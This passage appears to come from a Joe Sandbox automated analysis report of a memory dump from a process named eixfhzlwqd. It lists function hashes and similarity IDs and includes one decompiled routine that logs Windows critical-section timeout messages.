                                                              • Instruction ID: 8a0ad661e1d4370dcf97201568f7d010040891645d18cc8acd15e8649745bbfb
                                                              • Opcode Fuzzy Hash: b002d1be0b320e8bc8891f5bd26f428bb5cf750ada733535b46145a8437b1078
                                                              • Instruction Fuzzy Hash: 1D90026120144442E24162694C04B0F41159BE1342F91C029A4187554CC9558855A761
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00A696D0 Relevance: .0, Instructions: 4COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.357525357.0000000000A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_a00000_eixfhzlwqd.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 810c3a25465355c04138bae782ba375760098f65d96c52e92e1e63872b671f87
                                                              • Instruction ID: 773d2778dc8467259886de77418e663aad584267f8fb983b22409e47d37edf84
                                                              • Opcode Fuzzy Hash: 810c3a25465355c04138bae782ba375760098f65d96c52e92e1e63872b671f87
                                                              • Instruction Fuzzy Hash: 0690027120100842E20161694804B4600159BE0341F51C026A0155654D8655C851B561
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00A69A10 Relevance: .0, Instructions: 4COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.357525357.0000000000A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_a00000_eixfhzlwqd.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 3fa71ecf1f1d9c445151304aed3833e8e0265e9d75c32a3bc39244623d90f921
                                                              • Instruction ID: d5a1d3ebeee01ced9308c6041c451e26fa86e1cdd3a65233bfa8e33e22efa185
                                                              • Opcode Fuzzy Hash: 3fa71ecf1f1d9c445151304aed3833e8e0265e9d75c32a3bc39244623d90f921
                                                              • Instruction Fuzzy Hash: 1690027120140402E20161694C0874700159BD0342F51C021A5195555E86A5C891B571
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00A69610 Relevance: .0, Instructions: 4COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.357525357.0000000000A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_a00000_eixfhzlwqd.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: caf8fd9bfc5f7df02c4cbc348dcb7397715572ed23b1e8428ecb5dfdb09c71d4
                                                              • Instruction ID: 1b18bb7ebf4985a1fe1d89210cd1d63bb8dd790e35b63933ab7dd85c463568f6
                                                              • Opcode Fuzzy Hash: caf8fd9bfc5f7df02c4cbc348dcb7397715572ed23b1e8428ecb5dfdb09c71d4
                                                              • Instruction Fuzzy Hash: D390027160500802E2517169481474600159BD0341F51C021A0055654D87958A55B6E1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00A69650 Relevance: .0, Instructions: 4COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.357525357.0000000000A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_a00000_eixfhzlwqd.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 01d5386001e6e9abdca7a4faf25542374d6ebe98afd13fff20b745ebb2d60b18
                                                              • Instruction ID: 40568eb9cce82f8a2e265eeae2014845f5c5f0812fd232a502a3856d9fd4dd68
                                                              • Opcode Fuzzy Hash: 01d5386001e6e9abdca7a4faf25542374d6ebe98afd13fff20b745ebb2d60b18
                                                              • Instruction Fuzzy Hash: 5D90027120504842E24171694804A4600259BD0345F51C021A0095694D96658D55F6A1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00A6A3B0 Relevance: .0, Instructions: 4COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.357525357.0000000000A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_a00000_eixfhzlwqd.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 934600b63a928edc3838161f0d932b237cfef2b1849b0bf55ab6eb299f6c9f95
                                                              • Instruction ID: 1c07e685b9248a0ca8a7d71b81ece0834df6166bc52db77a44b00bf2bdfd8199
                                                              • Opcode Fuzzy Hash: 934600b63a928edc3838161f0d932b237cfef2b1849b0bf55ab6eb299f6c9f95
                                                              • Instruction Fuzzy Hash: 6090027120144002E2417169884460B5015ABE0341F51C421E0456554C86558856E261
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00A69730 Relevance: .0, Instructions: 4COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.357525357.0000000000A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_a00000_eixfhzlwqd.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 2cab4f9ac871bd48c2cafca12020ecef17bf90640669bfee708412a3bf8615ea
                                                              • Instruction ID: 41fc6f2be9d9b3c914add4c375e4b6b746089fedf2e3854bc7eb621d312c9217
                                                              • Opcode Fuzzy Hash: 2cab4f9ac871bd48c2cafca12020ecef17bf90640669bfee708412a3bf8615ea
                                                              • Instruction Fuzzy Hash: 8F90026160500402E2417169581870600259BD0341F51D021A0055554DC6998A55B6E1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00A69B00 Relevance: .0, Instructions: 4COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.357525357.0000000000A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_a00000_eixfhzlwqd.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 0542ec7ce29515950caf7977e33ec63c448f4fcbebadb1299ce634f3ddf849b3
                                                              • Instruction ID: 3db7a2a55a6b87fb06e794265a6d8faf5c2438b8ab3358b636f0af39e05e9e34
                                                              • Opcode Fuzzy Hash: 0542ec7ce29515950caf7977e33ec63c448f4fcbebadb1299ce634f3ddf849b3
                                                              • Instruction Fuzzy Hash: F290026124100802E241716988147070016DBD0741F51C021A0055554D86568965B6F1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00A6A710 Relevance: .0, Instructions: 4COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.357525357.0000000000A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_a00000_eixfhzlwqd.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: d4a9421a1efe8ab4d7152fcffdd546a7662f6d198ce4b230b6bf7714adc34f86
                                                              • Instruction ID: 240a83b20047886be21460905a2088b49708005e1e0d0d62ad48d95e1e774a3e
                                                              • Opcode Fuzzy Hash: d4a9421a1efe8ab4d7152fcffdd546a7662f6d198ce4b230b6bf7714adc34f86
                                                              • Instruction Fuzzy Hash: 3F90027130100052A601A6A95C04A4A41159BF0341B51D025A4045554C85948861A161
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00A69760 Relevance: .0, Instructions: 4COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.357525357.0000000000A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_a00000_eixfhzlwqd.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: cfbd89027deef4e67e8eab958a39ac733c713bc89fd794589b70e9fa2852cadc
                                                              • Instruction ID: 73ee08a15299705065822f6f5caabbdc169f7cab45f91853b670c6b23992c82d
                                                              • Opcode Fuzzy Hash: cfbd89027deef4e67e8eab958a39ac733c713bc89fd794589b70e9fa2852cadc
                                                              • Instruction Fuzzy Hash: AE90027120100403E2016169590870700159BD0341F51D421A0455558DD6968851B161
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00A69770 Relevance: .0, Instructions: 4COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.357525357.0000000000A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_a00000_eixfhzlwqd.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: eafcf230f3d9e3f8ce18aa2ad35a1d356b5bc12755c342c4291ab2f3143455c1
                                                              • Instruction ID: e8f363d4695ae5985b52594ee148fd37c23bcbafc696c5441a2b85634ee0dfa5
                                                              • Opcode Fuzzy Hash: eafcf230f3d9e3f8ce18aa2ad35a1d356b5bc12755c342c4291ab2f3143455c1
                                                              • Instruction Fuzzy Hash: 3090026120504442E20165695808A0600159BD0345F51D021A1095595DC6758851F171
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00A6A770 Relevance: .0, Instructions: 4COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.357525357.0000000000A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_a00000_eixfhzlwqd.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 8b3870d32b870c94e97e721f8c0a7a41c09e04a5fab8b564a8f9bd7e3ba31645
                                                              • Instruction ID: 498188deabbc0a1771e72910dcc14743ff67d2dc465e8c849df08a0358d301ff
                                                              • Opcode Fuzzy Hash: 8b3870d32b870c94e97e721f8c0a7a41c09e04a5fab8b564a8f9bd7e3ba31645
                                                              • Instruction Fuzzy Hash: 1990027520504442E60165695C04A8700159BD0345F51D421A045559CD86948861F161
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00A69670 Relevance: .0, Instructions: 2COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.357525357.0000000000A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_a00000_eixfhzlwqd.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                              • Instruction ID: dce6f95e1f134ab0a79cdc3f723e5afd6aecce0543b1d29046b612bf1790e284
                                                              • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                              • Instruction Fuzzy Hash:
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00ABFDDA Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 53%
                                                              			E00ABFDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E00A6CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E00AB5720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E00AB5720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}










                                                              0x00abfdda
                                                              0x00abfde2
                                                              0x00abfde5
                                                              0x00abfdec
                                                              0x00abfdfa
                                                              0x00abfdff
                                                              0x00abfe0a
                                                              0x00abfe0f
                                                              0x00abfe17
                                                              0x00abfe1e
                                                              0x00abfe19
                                                              0x00abfe19
                                                              0x00abfe19
                                                              0x00abfe20
                                                              0x00abfe21
                                                              0x00abfe22
                                                              0x00abfe25
                                                              0x00abfe40

                                                              APIs
                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00ABFDFA
                                                              Strings
                                                              • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 00ABFE2B
                                                              • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 00ABFE01
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.357525357.0000000000A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_a00000_eixfhzlwqd.jbxd
                                                              Similarity
                                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                              • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                                              • API String ID: 885266447-3903918235
                                                              • Opcode ID: 6f7e0163ec828fbed7ec1a8b1815ef5265984d09e575b4d53260352fd1fbc5b9
                                                              • Instruction ID: 4c6026f4567993a0dca8f7e8eea1f2696076978149833d754e41f9757770f907
                                                              • Opcode Fuzzy Hash: 6f7e0163ec828fbed7ec1a8b1815ef5265984d09e575b4d53260352fd1fbc5b9
                                                              • Instruction Fuzzy Hash: 20F0C236604601BFDA211A55DD02FB3BB6EEB45730F240614F628565E2DA62F87097E4
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%